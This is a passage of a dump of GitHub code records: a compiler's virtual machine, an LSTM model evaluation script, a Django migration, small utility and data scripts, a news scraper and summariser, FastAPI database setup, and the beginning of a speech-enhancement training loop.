len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) != bool(operand2)\n else : self.registers[target] = bool(operand1) != bool(operand2)\n elif operator == '&&':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) and bool(operand2)\n else : self.registers[target] = bool(operand1) and bool(operand2)\n elif operator == '||':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) or bool(operand2)\n else : self.registers[target] = bool(operand1) or bool(operand2)\n elif operator == '=' or operator == '<-':\n # Si es un string, es porque a fuerza es un ID ...\n if target.__class__.__name__ == 'str' :\n # En caso de estar en una función cualquiera, verificar la variable en su memoria exclusiva/recursiva\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = copy.deepcopy(self.recursiveTable.pop()) # [-1], Pop y append no funcionaron, esta libreria fue obligatoria\n for i, tuple_item in enumerate(table):\n if target == tuple_item[1]:\n foundRecursiveVar = True\n currentRow = table[i]\n # Actualizamos la columna \"value\"\n index_to_change = 6\n currentRow = currentRow[:index_to_change] + (operand1,)\n table[i] = currentRow\n # En caso de haberse transformado de INT a FLOAT, actualizar TYPE\n if currentRow[0] != operand1.__class__.__name__ :\n currentRow = (operand1.__class__.__name__,) + currentRow[1:]\n table[i] = currentRow\n self.recursiveTable.append(table) # Esto fue lo que resolvió la recursión compleja, me llevó días\n # Si no se encontró alguna varible en la tabla recursiva, es porque es global o ni siquiera estamos en una función\n if not foundRecursiveVar:\n for i, tuple_item in enumerate(self.symbolTable):\n if target == tuple_item[1]:\n currentRow = self.symbolTable[i]\n # Actualizamos la columna \"value\"\n index_to_change = 6\n currentRow = currentRow[:index_to_change] + (operand1,)\n self.symbolTable[i] = currentRow\n # En caso de haberse transformado de INT a FLOAT, actualizar TYPE\n if currentRow[0] != operand1.__class__.__name__ :\n currentRow = (operand1.__class__.__name__,) + currentRow[1:]\n self.symbolTable[i] = currentRow\n # Si no, es el index de un espacio temporal\n else:\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1\n else : self.registers[target] = operand1\n elif operator.lower() == 'goto':\n self.program_counter = target\n continue\n elif operator.lower() == 'gotof':\n if operand1 == 'False' or operand1 == 0 : self.program_counter = target\n else : self.program_counter += 1\n continue\n elif operator.lower() == 'gotov':\n # Aquí se me ocurrió cambiar el chequeo de booleanos igual a Python o C++ :\n # if num != 0 = TRUE, else FALSE no matter what\n if operand1 == 'True' or operand1 != 0 : self.program_counter = target\n else : self.program_counter += 1\n continue\n elif operator.lower() == 'print':\n if isinstance(operand1, list):\n for index, element in enumerate(operand1) :\n if isinstance(element, str) and re.match(r\"^t\\d+$\", element) : \n if len(self.recursiveRegisters) > 0 : operand1[index] = str(self.recursiveRegisters[-1][int(element[1:])])\n else : operand1[index] = str(self.registers[int(element[1:])])\n elif isinstance(element, str) and '\"' not in element and \"'\" not in element :\n # En caso de estar en una función cualquiera, verificar la variable en su memoria exclusiva/recursiva\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for i, tuple_item in enumerate(table):\n if element == tuple_item[1]:\n foundRecursiveVar = True\n operand1[index] = str(tuple_item[6])\n # Si no se encontró alguna variable en la tabla recursiva, es porque es global o ni siquiera estamos en una función\n if not foundRecursiveVar:\n for i, tuple_item in enumerate(self.symbolTable):\n if element == tuple_item[1]:\n operand1[index] = str(tuple_item[6])\n elif '\"' in element :\n operand1[index] = element.strip('\"')\n elif \"'\" in element :\n operand1[index] = element.strip(\"'\")\n \n operand1 = \" \".join(reversed(operand1))\n print(operand1.strip('\"')) if operand1.__class__.__name__ == 'str' else print(operand1)\n elif operator.lower() == 'gosub':\n self.program_counter = target\n self.functionJumps.append(operand2)\n self.returns.append(operand1)\n continue\n elif operator.lower() == 'endfunc' or operator.lower() == 'return':\n if operator.lower() == 'return' :\n temporal = int(self.returns.pop()[1:])\n if target.__class__.__name__ == 'str' or target.__class__.__name__ == 'char' :\n # En caso de estar en una función cualquiera, verificar la variable en su memoria exclusiva/recursiva\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for i, tuple_item in enumerate(table):\n if target == tuple_item[1]:\n foundRecursiveVar = True\n if len(self.recursiveRegisters) > 1 : self.recursiveRegisters[-2][temporal] = tuple_item[6]\n else : self.registers[temporal] = tuple_item[6]\n # Si no se encontró alguna variable en la tabla recursiva, es porque es global o ni siquiera estamos en una función\n if not foundRecursiveVar:\n for i, tuple_item in enumerate(self.symbolTable):\n if target == tuple_item[1]:\n self.registers[temporal] = tuple_item[6]\n elif isTargetTemp:\n if len(self.recursiveRegisters) > 1 : self.recursiveRegisters[-2][temporal] = self.recursiveRegisters[-1][target]\n else : self.registers[temporal] = self.recursiveRegisters[-1][target]\n else:\n if len(self.recursiveRegisters) > 1 : self.recursiveRegisters[-2][temporal] = target\n else : self.registers[temporal] = target\n \n self.recursiveIteration -= 1\n self.recursiveTable.pop()\n self.recursiveRegisters.pop()\n if self.functionJumps : \n self.program_counter = self.functionJumps.pop()\n continue\n elif operator.lower() == 'endprog':\n if operand1:\n print(\"v v v v v v === DEBUGGING === v v v v v v\")\n print(\"-------------- === Final Quadruples === --------------\")\n for i, item in enumerate(self.quadruples):\n print(f\"{i}: {item}\")\n print(\"-------------- === Final Symbol Table (Updated Values) === --------------\")\n pprint.pprint(self.symbolTable)\n #print('Registers:', self.registers) # It's so big\n #print('Recursive Registers:', self.recursiveRegisters) # Should always be empty\n print('Compilation Completed')\n elif operator.lower() == 'era':\n self.recursiveIteration += 1\n if self.recursiveIteration > 1 and self.recursiveTable :\n self.recursiveTable.append(self.recursiveTable[-1].copy())\n self.recursiveRegisters.append(self.registers.copy()) # Encontrar estos .copy() me hizo demasiado daño\n else :\n self.recursiveTable.append([entry for entry in self.symbolTable if entry[5] == target].copy())\n self.recursiveRegisters.append(self.registers.copy())\n\n self.program_counter += 1","repo_name":"Caferino/Compilador-CR","sub_path":"VirtualMachine.py","file_name":"VirtualMachine.py","file_ext":"py","file_size_in_byte":18131,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12463268971","text":"import torch\nimport pickle\nimport sys\n\nfrom torch.utils import data\nsys.path.append('./data/')\nfrom multi_hot_encoding import get_dataset_multi_hot\nfrom models.lstm_melody_models import LSTM_Multihot\nfrom helpers import evaluate_model\n\n\nmodel_path = 'models/trained_models/1_Baseline.pth'\ndataset = 1\n\nmodel_path_mel = 'models/trained_models/2_Melody.pth'\ndataset_mel = 2\n\nmodel_path_mel_w = 'models/trained_models/6_Melody_weighted.pth'\ndataset_mel_w = 6\n\nmodel_path_mel_dur = 'models/trained_models/5_Melody_Duration.pth'\ndataset_mel_dur = 5\n\nmodel_path_bass = 'models/trained_models/3_Bass.pth'\ndataset_bass = 3\n\nmodel_path_mel_bass = 'models/trained_models/4_Melody_Bass.pth'\ndataset_mel_bass = 4\n\nuse_saved_set=True\n\n\nhidden_dim = 192\nlayers = 2\nseed = 42\n\ndef compute_test_acc(model_path, dataset, use_saved_set=True):\n device = torch.device(\"cpu\")\n \n if use_saved_set:\n with open('data/datasets/dataset%d.pickle' % dataset, 'rb') as f:\n (train_dataset, val_dataset, test_dataset, input_size, target_size) = pickle.load(f)\n print('*** Dataset loaded from file ***')\n else:\n train_dataset, val_dataset, test_dataset, input_size, target_size = get_dataset_multi_hot(choice=dataset, seed=seed)\n \n # Load model\n model = LSTM_Multihot(input_size, embed_size=hidden_dim, lstm_hidden_size=hidden_dim, target_size=target_size, num_layers=layers)\n model.load_state_dict(torch.load(model_path))\n\n # evaluate\n tr_acc = evaluate_model(model, device, dataset=train_dataset)\n print('Train accuracy:\\t%.2f %%' % tr_acc)\n val_acc = evaluate_model(model, device, dataset=val_dataset)\n print('Val accuracy:\\t%.2f %%' % val_acc)\n te_acc = evaluate_model(model, device, dataset=test_dataset)\n print('Test accuracy:\\t%.2f %%' % te_acc)\n return te_acc\n \nprint('\\nLoading Baseline:')\nacc_baseline = compute_test_acc(model_path, dataset, use_saved_set=use_saved_set)\n#print('Baseline Loaded\\n')\n\nprint('\\n\\nLoading Melody:')\nacc_mel = compute_test_acc(model_path_mel, dataset_mel, use_saved_set=use_saved_set)\n#print('Melody Loaded\\n')\n\nprint('\\n\\nLoading Melody weighted:')\nacc_mel_w = compute_test_acc(model_path_mel_w, dataset_mel_w, use_saved_set=use_saved_set)\n#print('Melody weighted Loaded\\n')\n\nprint('\\n\\nLoading Melody + Duration:')\nacc_mel_dur = compute_test_acc(model_path_mel_dur, dataset_mel_dur, use_saved_set=use_saved_set)\n#print('Melody + Duration Loaded\\n')\n\nprint('\\n\\nLoading Bass:')\nacc_bass = compute_test_acc(model_path_bass, dataset_bass, use_saved_set=use_saved_set)\n#print('Bass Loaded\\n')\n\nprint('\\n\\nLoading Melody + Bass:')\nacc_mel_bass = compute_test_acc(model_path_mel_bass, dataset_mel_bass, use_saved_set=use_saved_set)\n#print('Melody + Bass: Loaded\\n')\n\n\n\nprint('\\n\\n-----------------------------------------')\nprint('| Model\\t\\t\\t| Test accuracy |')\nprint('-----------------------------------------')\nprint('| Baseline\\t\\t| %.2f %% \\t|' % acc_baseline)\nprint('-----------------------------------------')\nprint('| Melody\\t\\t| %.2f %% \\t|' % acc_mel)\nprint('| Melody weighted\\t| %.2f %% \\t|' % acc_mel_w)\nprint('| Melody duration\\t| %.2f %% \\t|' % acc_mel_dur)\nprint('| Bass\\t\\t\\t| %.2f %% \\t|' % acc_bass)\nprint('| Melody + Bass\\t\\t| %.2f %% \\t|' % acc_mel_bass)\nprint('-----------------------------------------\\n')\n","repo_name":"nereaiscamu/ML_project2","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70016252967","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('formacion', '0040_auto_20160101_1538'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RevisionInterventoriaDocenteSoporteActividades',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateTimeField(auto_now_add=True)),\n ('ip', models.IPAddressField(null=True, blank=True)),\n ('evidencia', models.ManyToManyField(to='formacion.EvidenciaDocentes', null=True, blank=True)),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='RevisionInterventoriaEscuelaTicSoporteActividades',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateTimeField(auto_now_add=True)),\n ('ip', models.IPAddressField(null=True, blank=True)),\n ('evidencia', models.ManyToManyField(to='formacion.EvidenciaEscuelaTic', null=True, blank=True)),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"Dandresfsoto/Andes","sub_path":"formacion/migrations/0041_revisioninterventoriadocentesoporteactividades_revisioninterventoriaescuelaticsoporteactividades.py","file_name":"0041_revisioninterventoriadocentesoporteactividades_revisioninterventoriaescuelaticsoporteactividades.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9921719271","text":"def reverseWords(self, s: str) -> str:\n i = 0\n t = list(s)\n while i < len(t):\n start = i\n end = i\n while end < len(s) and s[end] != \" \":\n end += 1\n i = end\n end -= 1\n while start < end:\n temp = s[start]\n t[start] = s[end]\n t[end] = s[start]\n start += 1\n end -= 1\n i += 1\n return ''.join(t)\n\n\na = \"Let's take LeetCode contest\"\nans = reverseWords(0, a)\nprint(ans)\n","repo_name":"baszabilsal/LeetCode_DataStructureAndAlgorithm","sub_path":"Algorithm/557_ReverseWordsInAString3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70046974569","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 21 15:18:51 2021\n\n@author: galih-hermawan\n\"\"\"\n\nfrom libHobiMahasiswa import ManajemenBerkas, UtilitasFileKode, Utilitas\nimport re\n\nut = Utilitas()\nutFK = UtilitasFileKode() \ndelimiter = utFK.PemisahKolom()\nlstFile, lstKolomKode = utFK.AmbilKodeDataFile()\nlstPolaFile, lstKolomPola = utFK.AmbilKodePola()\n\n# pola regex untuk menerima minimal 1 karakter apapun\npolaUmum = \"^.+$\"\n\nfMhs, fHobi, fMhsHobi = lstFile[0], lstFile[1], lstFile[2]\n\ndataMhs = ManajemenBerkas(lstFile[0]).BacaBerkas()\ndataHobi = ManajemenBerkas(lstFile[1]).BacaBerkas()\ndataMhsHobi = ManajemenBerkas(lstFile[2]).BacaBerkas()\nkamus = utFK.KamusFile_Kode(delimiter)\n\ndaftarKode = utFK.DaftarKolom(lstKolomKode, delimiter)\ndaftarPola = utFK.DaftarKolom(lstKolomPola, delimiter)\n# pola kolom yang kosong diisi dengan pola umum\nfor dp in range(len(daftarPola)):\n daftarPola[dp] = [polaUmum if d==\"\" else d for i, d in enumerate(daftarPola[dp])]\n\npolaMhs = daftarPola[0]\npolaHobi = daftarPola[1]\npolaMhsHobi = daftarPola[2]\n\n# tampil menu\nlstPil = []\nj = 0\nprint(\"Data yang ingin diperbarui:\")\nfor i in range(len(lstFile)):\n j += 1\n lstPil.append(j)\n print(f\"({j}) {lstFile[i]}.\")\n\nstrPil = [str(x) for x in lstPil]\nlstStrPil = \"/\".join(strPil)\npil = input(f\"Tulis angka menu ({lstStrPil}) atau ketik apapun untuk keluar : \")\n\nif pil.isdigit(): pil = int(pil)\n\n# menu update data mahasiswa\nif pil == 1:\n lstDataMasukan = []\n kodeCari = input(\"Masukkan nim: \")\n barisMhsDitemukan = ut.CariData(kodeCari, 0, dataMhs, delimiter, True)\n if barisMhsDitemukan:\n lstDataMasukan.append(kodeCari)\n barisDataLama = ut.AmbilData(barisMhsDitemukan, dataMhs, delimiter)[0]\n print(\"Kosongkan data jika akan menggunakan data lama.\")\n for i in range(1,len(daftarKode[0])):\n nmKolom = daftarKode[0][i]\n dataKolom = dataMhsDitemukan = ut.AmbilData(barisMhsDitemukan, dataMhs, delimiter, [i])\n while True: \n dataMasukan = input(f\"Data {nmKolom} lama '{dataKolom[0]}', data baru: \") \n if dataMasukan.strip():\n if re.match(polaMhs[i], dataMasukan):\n dataKolomBaru = dataMasukan\n break\n else:\n print(f\"Format '{nmKolom}' tidak sesuai.\")\n else:\n dataKolomBaru = dataKolom[0]\n break\n lstDataMasukan.append(dataKolomBaru)\n #print(\"Data baru: \",lstDataMasukan)\n barisDataBaru = delimiter.join(lstDataMasukan)\n #print(barisDataBaru)\n dataBaru = ut.UpdateData(barisDataLama, barisDataBaru, dataMhs)\n #print(dataBaru)\n ManajemenBerkas(fMhs).TulisBerkas(dataBaru)\n print(\"Pembaruan data berhasil dilakukan.\")\n else:\n print(f\"Data nim '{kodeCari}' tidak ditemukan.\")\n\n# menu update data hobi\nelif pil==2:\n kodeCari = input(\"Masukkan kode hobi: \")\n barisHobiDitemukan = ut.CariData(kodeCari, 0, dataHobi, delimiter, True)\n if barisHobiDitemukan:\n nmHobiBaruSudahAda = False\n barisDataLama = ut.AmbilData(barisHobiDitemukan, dataHobi, delimiter)[0]\n nmHobiLama = ut.AmbilData(barisHobiDitemukan, dataHobi, delimiter, [1])[0]\n print(\"Kosongkan data jika ingin menggunakan data lama.\")\n nmHobi = input(f\"Data lama: '{nmHobiLama}', data baru: \")\n nmHobi.strip()\n if nmHobi:\n nmHobiBaru = nmHobi\n # cek apakah hobi baru sudah pernah ada di data hobi\n nmHobiBaruSudahAda = ut.CariData(nmHobiBaru, 1, dataHobi, delimiter, True)\n else:\n nmHobiBaru = nmHobiLama\n \n if nmHobiBaruSudahAda:\n print(\"Nama hobi baru sudah ada.\")\n else:\n barisDataBaru = delimiter.join([kodeCari, nmHobiBaru])\n print(barisDataBaru)\n dataBaru = ut.UpdateData(barisDataLama, barisDataBaru, dataHobi)\n ManajemenBerkas(fHobi).TulisBerkas(dataBaru)\n print(\"Pembaruan data berhasil dilakukan.\")\n else:\n print(f\"Data kode hobi '{kodeCari}' tidak ditemukan.\")\n# menu update data mhshobi\nelif pil==3:\n kodeCari = input(\"Masukkan nim: \")\n barisMhsDitemukan = ut.CariData(kodeCari, 0, dataMhsHobi, delimiter, True)\n if barisMhsDitemukan:\n nmHobiBaruSudahAda = False\n # jml hobi mungkin lebih dari satu\n barisDataLama = ut.AmbilData(barisMhsDitemukan, dataMhsHobi, delimiter)\n kodeHobiLama = ut.AmbilData(barisMhsDitemukan, dataMhsHobi, delimiter, [1])\n lstKodeHobiBaru = []\n print(f\"Kode hobi lama: {kodeHobiLama}\")\n print(\"Kosongkan data jika ingin menggunakan data lama.\")\n for i, data in enumerate(kodeHobiLama):\n while True:\n kodeHobi = input(f\"Data lama {i+1}: '{kodeHobiLama[i]}', data baru: \")\n kodeHobi.strip()\n # periksa apakah kodehobi terdaftar di data Hobi\n kodeHobiTerdaftar = ut.CariData(kodeHobi, 0, dataHobi, delimiter, True)\n if not kodeHobi: #kodehobi dikosongkan, menyimpan data lama\n lstKodeHobiBaru.append(data)\n break\n elif not kodeHobiTerdaftar:\n print(f\"Kode hobi {kodeHobi} belum terdaftar di data Hobi.\")\n elif kodeHobi in kodeHobiLama and kodeHobi != data:\n print(f\"Kode hobi {kodeHobi} sudah pernah disimpan.\")\n else:\n lstKodeHobiBaru.append(kodeHobi)\n break\n \n barisDataBaru = [delimiter.join([kodeCari,i] )for i in lstKodeHobiBaru] \n \n print(\"Data baru: \",barisDataBaru)\n dataBaru = ut.UpdateData(barisDataLama, barisDataBaru, dataMhsHobi)\n #print(dataBaru)\n ManajemenBerkas(fMhsHobi).TulisBerkas(dataBaru)\n print(\"Pembaruan data berhasil dilakukan.\")\n else:\n print(f\"Data kode hobi '{kodeCari}' tidak ditemukan.\")\nelse:\n print(\"Keluar aplikasi.\")\n\n","repo_name":"galihboy/HobiMahasiswa","sub_path":"console-optimized/updateData.py","file_name":"updateData.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"id","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73642919208","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 11 17:12:34 2020\r\n\r\n@author: Jasar Althaf\r\n\"\"\"\r\n\r\n#importing packages\r\nimport requests\r\nimport urllib.request\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom gensim.summarization.summarizer import summarize\r\nfrom gensim.summarization import keywords\r\n\r\n\r\n\r\nurl=['https://timesofindia.indiatimes.com/home/education/news/career-in-data-science-in-india-courses-certification-salary-future-growth/articleshow/75023624.cms',\r\n 'https://timesofindia.indiatimes.com/india/62064-more-covid-19-cases-in-india-recoveries-cross-15-lakh-mark/articleshow/77456041.cms',\r\n 'https://timesofindia.indiatimes.com/world/pakistan/pakistan-us-review-bilateral-relationship/articleshow/77503580.cms',\r\n 'https://timesofindia.indiatimes.com/india/as-china-factor-looms-india-hopes-to-work-with-lankas-rajapaksas-for-development/articleshow/77509553.cms',\r\n 'https://timesofindia.indiatimes.com/sports/football/champions-league/top-stories/thousands-have-tried-bayern-munich-ponder-how-to-stop-messi/articleshow/77489723.cms']\r\n\r\nsection=['section1','clearfix rel','clearfix rel','clearfix rel','clearfix rel']\r\n\r\n\r\ndef fun(url,section):\r\n article = ''\r\n response = requests.get(url)\r\n#initializing parser\r\n soup = BeautifulSoup(response.text, \"html.parser\")\r\n#Fetching Div = \"section1\" data\r\n content = soup.find('div', {\"class\": section})\r\n#Creating the text data\r\n for i in content.findAll('div'):\r\n article = article + ' ' + i.text\r\n keywor=keywords(article).split('\\n')\r\n summary=(summarize(article,ratio=0.25))\r\n return article,keywor,summary\r\n\r\ndata=[]\r\n\r\ndef funtion(url,text,key,summary):\r\n for i in range(0,length):\r\n data.append({\r\n 'url':url[i],\r\n 'text':text[i],\r\n 'key':key[i],\r\n 'summary':summary[i]})\r\n \r\n return data\r\n\r\n\r\nlength=len(url)-1\r\n\r\ntext=[]\r\nkey=[]\r\nsummary=[]\r\n\r\n\r\n\r\nfor i in range(0,length):\r\n tex,keyw,summa=fun(url[i],section[i])\r\n text.append(tex)\r\n key.append(keyw)\r\n summary.append(summa)\r\n \r\n \r\n \r\ndata=funtion(url,text,key,summary)\r\n\r\n\r\ndf=pd.DataFrame(data)\r\n\r\n\r\ndf.head()\r\n","repo_name":"althafjasar/webscarpping-and-recommendation","sub_path":"incent/DATA SCRAPPING.PY","file_name":"DATA SCRAPPING.PY","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10727662101","text":"import cv2\nimport numpy as np\n\n\ndef backward_transform(img, angle):\n height, width = img.shape\n result = np.zeros((height, width), np.uint8)\n\n affine = np.array([[np.cos(np.radians(angle)), np.sin(np.radians(angle)), 0],\n [-np.sin(np.radians(angle)), np.cos(np.radians(angle)), 0],\n [0, 0, 1]])\n\n for x in range(width):\n for y in range(height):\n p = affine.dot(np.array([x, y, 1]))\n xp = int(p[0])\n yp = int(p[1])\n\n if 0 <= yp < height and 0 <= xp < width:\n result[y, x] = img[yp, xp]\n return result\n\n\nin_image = cv2.imread('sample.jpg', 0)\nout_image = backward_transform(in_image, 20)\n\ncv2.imshow('input', in_image)\ncv2.imshow('output', out_image)\n\ncv2.imwrite('bw_transformed.jpg', out_image)\ncv2.waitKey()","repo_name":"ruhz3/img-processing","sub_path":"backward mapping/backward_mapping.py","file_name":"backward_mapping.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9254701529","text":"from contextlib import asynccontextmanager\nfrom typing import AsyncGenerator\nfrom bson import ObjectId\nfrom sqlalchemy import inspect\nfrom sqlalchemy.ext.asyncio import AsyncSession, create_async_engine\nfrom sqlalchemy.ext.declarative import as_declarative\nfrom sqlalchemy.orm import sessionmaker\n\nfrom netcore.config import settings\nimport motor.motor_asyncio\n\nengine = create_async_engine(settings.database_url, future=True, echo=True)\nasync_session = sessionmaker(\n bind=engine, expire_on_commit=False, class_=AsyncSession, autocommit=False, autoflush=False\n)\n\n\n@as_declarative()\nclass Base:\n \"\"\"\n Base class to inherit from when we want to create a table in the database.\n I customized it to be able to give ORM object as dict to convert them into Pydantic objects if needed.\n You can see an example in graphql module.\n \"\"\"\n\n def _asdict(self):\n return {c.key: getattr(self, c.key) for c in inspect(self).mapper.column_attrs}\n\n\n@asynccontextmanager\nasync def get_session() -> AsyncGenerator[AsyncSession, None]:\n \"\"\"_summary_\n This function return a session usable within an async context manager in another submodule for example.\n The goal is to have access to the database as easy as possible.\n\n Returns:\n AsyncGenerator[AsyncSession, None]\n\n Yields:\n Iterator[AsyncGenerator[AsyncSession, None]]\n \"\"\"\n async with async_session() as session:\n async with session.begin():\n try:\n yield session\n finally:\n await session.close()\n\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(settings.mongodb_url)\nmongodb = client.netcore # it is the database name right here\n\n\nclass PyObjectId(ObjectId):\n \"\"\"\n MongoDB stores objects as BSON, ObjectId let us convert it as JSON dict easily with Python.\n This class allow us to use ObjectId stored in MongoDB as Pydantic Field.\n \"\"\"\n\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if not ObjectId.is_valid(v):\n raise ValueError(\"Invalid objectid\")\n return ObjectId(v)\n\n @classmethod\n def __modify_schema__(cls, field_schema):\n field_schema.update(type=\"string\")\n","repo_name":"Never77/fastapi-sample-project","sub_path":"netcore/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15177387575","text":"import sys\r\nimport os\r\n\r\ncurPath = os.path.abspath(os.path.dirname(__file__))\r\nrootPath = os.path.split(curPath)[0]\r\nsys.path.append(rootPath)\r\n\r\nimport torch.nn as nn\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib.pyplot import specgram\r\nfrom torch.autograd import Variable\r\nimport scipy.io as scio\r\nimport librosa\r\nimport numpy as np\r\nfrom net.net import Net\r\nfrom load_data.SpeechDataLoad import SpeechDataset, FeatureCreator\r\n\r\nfrom torch.utils.data import DataLoader\r\nimport torch.optim as optim\r\nfrom utils.model_handle import save_model, resume_model\r\nfrom utils.loss_set import LossHelper,SISDRLoss\r\nfrom utils.pesq import pesq\r\nimport progressbar\r\nfrom config import *\r\nfrom utils.util import get_alpha, expandWindow\r\nimport time\r\nfrom utils.stft_istft import STFT\r\nfrom tensorboardX import SummaryWriter\r\nfrom utils.label_set import LabelHelper\r\n\r\nimport pickle\r\n\r\n\r\ndef load_obj(root_dir, name):\r\n with open(root_dir + name, 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\nclass BatchInfo(object):\r\n\r\n def __init__(self, speech, mix, frame):\r\n self.speech = speech\r\n self.mix = mix\r\n self.frame = frame\r\n\r\n\r\ndef collate(batch):\r\n \"\"\"\r\n 将每个batch中的数据pad成一样长,采取补零操作\r\n 切记为@staticmethod方法\r\n :param batch:input和label的list\r\n :return:input、label和真实帧长的list\r\n \"\"\"\r\n speech_lst = []\r\n mix_lst = []\r\n frame_size_lst = []\r\n for item in batch:\r\n speech = item[0]\r\n mix = item[1]\r\n speech = speech / torch.max(torch.abs(speech)) # 幅值归一化\r\n mix = mix / torch.max(torch.abs(mix))\r\n speech_lst.append(speech)\r\n mix_lst.append(mix)\r\n # 计算帧长((语音长度-窗长度)/帧移)\r\n frame = (item[0].shape[0] - FILTER_LENGTH) // HOP_LENGTH + 1\r\n # 存储每句话的真实帧长,用于计算loss\r\n frame_size_lst.append(frame)\r\n speech_lst = nn.utils.rnn.pad_sequence(speech_lst)\r\n mix_lst = nn.utils.rnn.pad_sequence(mix_lst)\r\n return BatchInfo(speech_lst, mix_lst, frame_size_lst)\r\n\r\n\r\ndef validation(net, path, type):\r\n net.eval()\r\n file = os.listdir(path)\r\n # label_helper = LabelHelper()\r\n # mse = nn.MSELoss()\r\n SI_SDR = SISDRLoss()\r\n sum_loss = 0\r\n\r\n stft = STFT(filter_length=FILTER_LENGTH, hop_length=HOP_LENGTH).cuda(CUDA_ID[0])\r\n if type == 0:\r\n n = 50\r\n else:\r\n n = VALIDATION_DATA_NUM\r\n bar = progressbar.ProgressBar(0, n)\r\n for i in range(n):\r\n bar.update(i)\r\n with torch.no_grad():\r\n data = load_obj(VALIDATION_DATA_PATH, file[i])\r\n # 迭代输出需要的文件\r\n speech = np.array(data['speech'])\r\n speech = torch.Tensor(speech[np.newaxis, :])\r\n mix = np.array(data['mix'])\r\n mix = torch.Tensor(mix[np.newaxis, :])\r\n speech = speech / torch.max(torch.abs(speech)) # 幅值归一化\r\n mix = mix / torch.max(torch.abs(mix))\r\n speech_spec = stft.transform(speech.cuda(CUDA_ID[0]))\r\n speech_mag = stft.spec_transform(speech_spec)\r\n mix_spec = stft.transform(mix.cuda(CUDA_ID[0]))\r\n\r\n output = net(mix_spec)\r\n output_mag = torch.sqrt(output[:, :, :, 0] ** 2 + output[:, :, :, 1] ** 2)\r\n loss = LossHelper.single_spec_mag_loss(torch.cat([output,output_mag.unsqueeze(-1)],dim=-1), torch.cat([speech_spec,speech_mag.unsqueeze(-1)],dim=-1))\r\n # loss = mse(output, speech_spec)\r\n # loss = SI_SDR(output,speech_spec)\r\n sum_loss += loss.item()\r\n bar.finish()\r\n return sum_loss / n\r\n\r\n\r\ndef train(net, epoch, data_loader, optimizer):\r\n global global_step\r\n global global_time\r\n global LR\r\n writer = SummaryWriter(LOG_STORE)\r\n feature_creator = FeatureCreator()\r\n SI_SDR=SISDRLoss()\r\n # stft = STFT(filter_length=FILTER_LENGTH, hop_length=HOP_LENGTH).cuda(CUDA_ID[0])\r\n bar = progressbar.ProgressBar(0, train_data_set.__len__() // TRAIN_BATCH_SIZE)\r\n for i in range(epoch):\r\n if i%2==0 and i!=0:\r\n if LR > 1e-8:\r\n LR = LR/2\r\n optimizer.param_groups[0]['lr'] = LR\r\n sum_loss = 0\r\n bar.start()\r\n for batch_idx, batch_info in enumerate(data_loader):\r\n mix_spec, speech_spec,speech_mag,frame = feature_creator(batch_info)\r\n\r\n bar.update(batch_idx)\r\n output = net(mix_spec.cuda(CUDA_ID[0]))\r\n output_mag = torch.sqrt(output[:, :, :, 0] ** 2 + output[:, :, :, 1] ** 2)\r\n loss = LossHelper.spec_mag_loss(torch.cat([output,output_mag.unsqueeze(-1)],dim=-1), torch.cat([speech_spec,speech_mag.unsqueeze(-1)],dim=-1), frame)\r\n # loss = SI_SDR(output,speech_spec)\r\n # loss = LossHelper.mse_loss(output.cuda(CUDA_ID[0]), speech_spec.cuda(CUDA_ID[0]), frame)\r\n sum_loss += loss.item()\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # 10次打一次loss\r\n if global_step % 10 == 0 and global_step != 0:\r\n writer.add_scalar('Train/Loss', sum_loss / global_time, global_step)\r\n # cv_loss = validation(net, VALIDATION_DATA_PATH, 0)\r\n # 